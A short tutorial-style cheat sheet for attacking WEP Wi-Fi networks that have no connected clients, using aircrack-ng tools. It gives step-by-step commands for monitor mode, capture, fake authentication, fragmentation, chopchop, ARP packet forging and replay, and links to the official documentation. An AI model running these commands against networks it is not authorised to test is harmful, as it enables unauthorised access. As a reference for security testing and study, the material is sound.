Clientless WEP
Table of Contents
This is intended to be a quick reference for more detailed information please refer to aircrack-ng documentation.
Setup
Monitor Mode 1
list available interfaces
sudo airmon-ng
pseudo
sudo airmon-ng start <interface> <channel>
example
sudo airmon-ng start wlan0 6
Packet Capture 2
pseudo
sudo airodump-ng --channel <channel_number> --bssid <AP_BSSID> -w <file> --ivs <interface>
example
sudo airodump-ng --channel 6 --bssid 00:AA:11:BB:22:CC -w test --ivs wlan0mon
Fake Authentication 3
pseudo
sudo aireplay-ng --fakeauth 20 -a <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --fakeauth 20 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
Fragmentation 4
pseudo
sudo aireplay-ng --fragment -a <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --fragment -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
Korek Chop Chop 5
pseudo
sudo aireplay-ng --chopchop -b <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --chopchop -b 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
Packet Forge 6
psudo
packetforge-ng -0 -a <AP_BSSID> -h <source_BSSID> -k <AP_IPAddress> -l <source_IPAddress> -y <xor_file> -w <output_file>
example
packetforge-ng -0 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC -k 192.168.1.1 -l 192.168.1.2 -y replay_dec-1002-153255.xor -w arp-request
ARP replay 7
psudo
sudo aireplay-ng --interactive -r <packet_file> <interface>
example
sudo aireplay-ng --interactive -r arp-request wlan0mon
Modified Packet Replay 8
pseudo
sudo aireplay-ng --interactive -b <AP_BSSID> -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 <interface>
example
sudo aireplay-ng --interactive -b 00:AA:11:BB:22:CC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon
Footnotes
1 https://www.aircrack-ng.org/doku.php?id=airmon-ng
2 https://www.aircrack-ng.org/doku.php?id=airodump-ng
3 https://www.aircrack-ng.org/doku.php?id=fake_authentication
4 https://www.aircrack-ng.org/doku.php?id=fragmentation
5 https://www.aircrack-ng.org/doku.php?id=korek_chopchop
6 https://www.aircrack-ng.org/doku.php?id=packetforge-ng
7 https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection
8 https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay